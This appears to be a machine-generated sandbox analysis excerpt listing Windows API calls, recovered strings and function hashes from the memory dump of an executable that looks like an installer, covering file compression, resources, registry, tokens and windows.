                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorDesktopWindow$Show
                                                                                  • String ID:
                                                                                  • API String ID: 2074268717-0
                                                                                  • Opcode ID: c82077e875ceebfb446ca8bdba497cc44f2f016adda31143cf8d95e20cbb1c8e
                                                                                  • Instruction ID: a5e00dcc6fd9115ed5a77459d70fea990a5215d510f46849e0ce2877443e0a13
                                                                                  • Opcode Fuzzy Hash: c82077e875ceebfb446ca8bdba497cc44f2f016adda31143cf8d95e20cbb1c8e
                                                                                  • Instruction Fuzzy Hash: CA413771600260EFC714EF29E9C4B9677E1AB69325F16807BE404DB366DA38BD81CF58
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A85
                                                                                  • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AF4
                                                                                  • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B8F
                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BCE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString$FileMessageModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 704749118-0
                                                                                  • Opcode ID: 2478aacc1cc0604c87cef9c23ce28a73e3b8baee1560f3a98c189eb7686d3011
                                                                                  • Instruction ID: c07fd310ac7ce6f4f6bdd3d287b746ce8d52192ab59c667046e5b60d4d48b312
                                                                                  • Opcode Fuzzy Hash: 2478aacc1cc0604c87cef9c23ce28a73e3b8baee1560f3a98c189eb7686d3011
                                                                                  • Instruction Fuzzy Hash: 0E3134716083849BD730EB65C945BDBB7E8AB85704F40483FB6C8DB2D1EB7859048B6B
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E981
                                                                                    • Part of subcall function 0044CFC4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CFF6
                                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044EA05
                                                                                    • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                  • IsRectEmpty.USER32(?), ref: 0044E9C7
                                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E9EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                  • String ID:
                                                                                  • API String ID: 855768636-0
                                                                                  • Opcode ID: be830068c3edf1c95023cfeceac366b6905f068659723eff49c6974a0b69c569
                                                                                  • Instruction ID: 77b7b7799a66ce86f667cf0b036ff1ab111c9581c09ca9d8f795578908ad38d2
                                                                                  • Opcode Fuzzy Hash: be830068c3edf1c95023cfeceac366b6905f068659723eff49c6974a0b69c569
                                                                                  • Instruction Fuzzy Hash: 36118C72B0034027E610BA3E8C86B5B66C99B88708F14083FB605EB3C7DE7CDC094399
                                                                                  APIs
                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00496060
                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 0049607B
                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00496095
                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 004960B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: OffsetRect
                                                                                  • String ID:
                                                                                  • API String ID: 177026234-0
                                                                                  • Opcode ID: a5b10c5c05c4c4c8690ebf0e0d14455fb01428b86b9d3b295170541a370ec2ec
                                                                                  • Instruction ID: 8eac29a9a723dba05d0f501e7f7c311a2f3b3ed3193ada35ebb1b3014bd25ec0
                                                                                  • Opcode Fuzzy Hash: a5b10c5c05c4c4c8690ebf0e0d14455fb01428b86b9d3b295170541a370ec2ec
                                                                                  • Instruction Fuzzy Hash: F6215EB6700201ABCB00DE69CDC5E6BB7EEEBD4344F15CA2AF548C7389D634E9448796
                                                                                  APIs
                                                                                  • GetCursorPos.USER32 ref: 00417270
                                                                                  • SetCursor.USER32(00000000), ref: 004172B3
                                                                                  • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                  • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1959210111-0
                                                                                  • Opcode ID: e1b8292847e1495943439bfb526301e98f20bb6a1a323b8f65a3f0d30a7d056b
                                                                                  • Instruction ID: a3ca0b5fbe6c86dc8433d056dfe209cecf977414c0e936569190c1b416abce34
                                                                                  • Opcode Fuzzy Hash: e1b8292847e1495943439bfb526301e98f20bb6a1a323b8f65a3f0d30a7d056b
                                                                                  • Instruction Fuzzy Hash: 7F2180713086018BC720AF69D885ADB73B1AB48764B4545ABF855CB352D73DDC82CB49
                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00495CC9
                                                                                  • MulDiv.KERNEL32(50142444,00000008,?), ref: 00495CDD
                                                                                  • MulDiv.KERNEL32(F6F86FE8,00000008,?), ref: 00495CF1
                                                                                  • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495D0F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                  • Instruction ID: f271e463c2a04687a7cd3b1fed15c38c3ae6b45cd4ce19c79766351c2a45cab8
                                                                                  • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                  • Instruction Fuzzy Hash: 78112172604604AFCB40EFA9C8C4D9B7BECEF4D320B24416AFD19DB246D634ED408BA4
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                  • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                  • RegisterClassA.USER32(0049A598), ref: 0041F4E4
                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4025006896-0
                                                                                  • Opcode ID: 46111e49518ace76b25441b5b8420e7e5a88ee32249e97549851b52d686e3228
                                                                                  • Instruction ID: bc278c4f6faf11cefbb7876bdabff60d814ef9460a0beef0b041e337848a6ca8
                                                                                  • Opcode Fuzzy Hash: 46111e49518ace76b25441b5b8420e7e5a88ee32249e97549851b52d686e3228
                                                                                  • Instruction Fuzzy Hash: BB014071300104BBCB10EBA9ED81E9B779C9719314F51423BB505E72E2D6399C158BBD
                                                                                  APIs
                                                                                  • WaitForInputIdle.USER32(00000001,00000032), ref: 0045501C
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045503E
                                                                                  • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 0045504D
                                                                                  • CloseHandle.KERNEL32(00000001,0045507A,00455073,?,00000031,00000080,00000000,?,?,004553D3,00000080,0000003C,00000000,004553E9), ref: 0045506D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                  • String ID:
                                                                                  • API String ID: 4071923889-0
                                                                                  • Opcode ID: aaa38026e2161bc5d10e27088da429faa58cfaab67b23fe3f60cb52595d37df2
                                                                                  • Instruction ID: d12116b756cd226a9453b7b7c95f557e71215baafd626de0b651f5c3ff172158
                                                                                  • Opcode Fuzzy Hash: aaa38026e2161bc5d10e27088da429faa58cfaab67b23fe3f60cb52595d37df2
                                                                                  • Instruction Fuzzy Hash: F801F570A00A08BEEB209BA9CC12F7F7BACDF45B60F600167B904D32C2C5789D0486B8
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D037
                                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A7D8,00400000,00000001,00000000,?,0040CF94,00000000,?,00000000,?,?,0047CFDC,0000000A,00000000), ref: 0040D051
                                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7D8,00400000,00000001,00000000,?,0040CF94,00000000,?,00000000,?,?,0047CFDC), ref: 0040D06B
                                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7D8,00400000,00000001,00000000,?,0040CF94,00000000,?,00000000,?), ref: 0040D075
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                  • Instruction ID: 36a118f2821a5a72c918f59cdb85223c1d13502428e6f53becfecf356bbc3684
                                                                                  • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                  • Instruction Fuzzy Hash: ECF062B36055046F9B04EFADA881D5B77DCDE88364310017FF908E7282DA39DD118B78
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 004707E9
                                                                                  Strings
                                                                                  • Setting NTFS compression on file: %s, xrefs: 004707B7
                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 004707FA
                                                                                  • Unsetting NTFS compression on file: %s, xrefs: 004707CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                  • API String ID: 1452528299-3038984924
                                                                                  • Opcode ID: 0da083cedf78d204021f0c22f46e9404a6a0d1fca2abd04a8242647f3c87b887
                                                                                  • Instruction ID: 145c5581ad0eca4b083c726d4b350626947fd7e4083fb75601c5580ae1b156b2
                                                                                  • Opcode Fuzzy Hash: 0da083cedf78d204021f0c22f46e9404a6a0d1fca2abd04a8242647f3c87b887
                                                                                  • Instruction Fuzzy Hash: 38016C31D0D148A9CB04D7ED60416DDBFA89F09304F45C5EFA459D7282D7B915088BDA
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B856,?,?,?,?,?,00000000,0045B87D), ref: 00455E80
                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B856,?,?,?,?,?,00000000), ref: 00455E89
                                                                                  • RemoveFontResourceA.GDI32(00000000), ref: 00455E96
                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455EAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                  • String ID:
                                                                                  • API String ID: 4283692357-0
                                                                                  • Opcode ID: d198827404060030b3dfc17e22509fcb3a77ecf8fff02d6a53b0f294283eb161
                                                                                  • Instruction ID: 2b3bc76bcbe24f9a378c9fd2a9d0a5bd871778c5a23a50a9ca37bd21dd0b5b9e
                                                                                  • Opcode Fuzzy Hash: d198827404060030b3dfc17e22509fcb3a77ecf8fff02d6a53b0f294283eb161
                                                                                  • Instruction Fuzzy Hash: C2F030B574470176EA10B7B69C47F1B228C8B54745F14483ABA00EB2C3D97CD904966D
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 0047003D
                                                                                  Strings
                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 0047004E
                                                                                  • Setting NTFS compression on directory: %s, xrefs: 0047000B
                                                                                  • Unsetting NTFS compression on directory: %s, xrefs: 00470023
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                  • API String ID: 1452528299-1392080489
                                                                                  • Opcode ID: 501c20c4b4589d314784abe810e87fd7af79d86b38d8ef254cb346fbb93d82bb
                                                                                  • Instruction ID: 604d54a06cc176a09f793a0f1904e0e91a55842988fe096117b9dad4a0540a88
                                                                                  • Opcode Fuzzy Hash: 501c20c4b4589d314784abe810e87fd7af79d86b38d8ef254cb346fbb93d82bb
                                                                                  • Instruction Fuzzy Hash: 96011731D0D288A6CB04D7AD70417DDBFB49F49314F44C1EFA459E7282DB790909879A
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CountSleepTick
                                                                                  • String ID:
                                                                                  • API String ID: 2227064392-0
                                                                                  • Opcode ID: 9d8c620ac145a49ef357bc67e7af840132a63e2ed6bee5855d7efcfcc9ec2cde
                                                                                  • Instruction ID: ce153dc38a8bb7651996ca8f0dac3f9c26bc2c6ac7669c34f37b685d31f90408
                                                                                  • Opcode Fuzzy Hash: 9d8c620ac145a49ef357bc67e7af840132a63e2ed6bee5855d7efcfcc9ec2cde
                                                                                  • Instruction Fuzzy Hash: D1E0E562B59140658A2431FE18C25BF85A8CECA364B18867FE4C9D6243CC5D8C0786BF
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000008,?,?,00000001,00000000,00000002,00000000,004817AB,?,?,?,?,?,004993B3,00000000,004993DB), ref: 00478649
                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000001,00000000,00000002,00000000,004817AB,?,?,?,?,?,004993B3,00000000), ref: 0047864F
                                                                                  • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,00000001,00000000,00000002,00000000,004817AB), ref: 00478671
                                                                                  • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,00000001,00000000,00000002,00000000,004817AB), ref: 00478682
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                  • String ID:
                                                                                  • API String ID: 215268677-0
                                                                                  • Opcode ID: 897cebff796fb9acf24ada6806b428e4bae0fdb6bab1f730a63c16ba700ca759
                                                                                  • Instruction ID: 838b6a51ddc7838befbc46fdc110c266dd1fb76be3e125ebbed13216a87d498a
                                                                                  • Opcode Fuzzy Hash: 897cebff796fb9acf24ada6806b428e4bae0fdb6bab1f730a63c16ba700ca759
                                                                                  • Instruction Fuzzy Hash: 8CF01CB16443007BD600EAA58C82A9B72DCEB44754F04883E7A98CB2D1DA79D808AB66
                                                                                  APIs
                                                                                  • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                  • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                  • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                  • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                  • String ID:
                                                                                  • API String ID: 2280970139-0
                                                                                  • Opcode ID: 0c1e0aa051013007664b3f07c8d487170f49f724953434a4891b7e2a8b6b14ea
                                                                                  • Instruction ID: 2755c926dfb62d6ecb2d5c8fb2e1e882bb3f56b09ddc897a1aa573e645a4fcd2
                                                                                  • Opcode Fuzzy Hash: 0c1e0aa051013007664b3f07c8d487170f49f724953434a4891b7e2a8b6b14ea
                                                                                  • Instruction Fuzzy Hash: 99E0EC61B0257196AAB1EA7B2881A9F118CDD46BE434602A7FD41F7287DB2CDC1045BD
                                                                                  APIs
                                                                                  • GlobalHandle.KERNEL32 ref: 0040627F
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406286
                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040628B
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406291
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocHandleLockUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 2167344118-0
                                                                                  • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                  • Instruction ID: 024a49765fc045a09389489d8ed5919b86daafa6bea6a005e9f609907830066e
                                                                                  • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                  • Instruction Fuzzy Hash: 64B009C6925A46B8EC0473B24C4BD3F041CE88472C3809A6E7554BA0839C7C9C002E3A
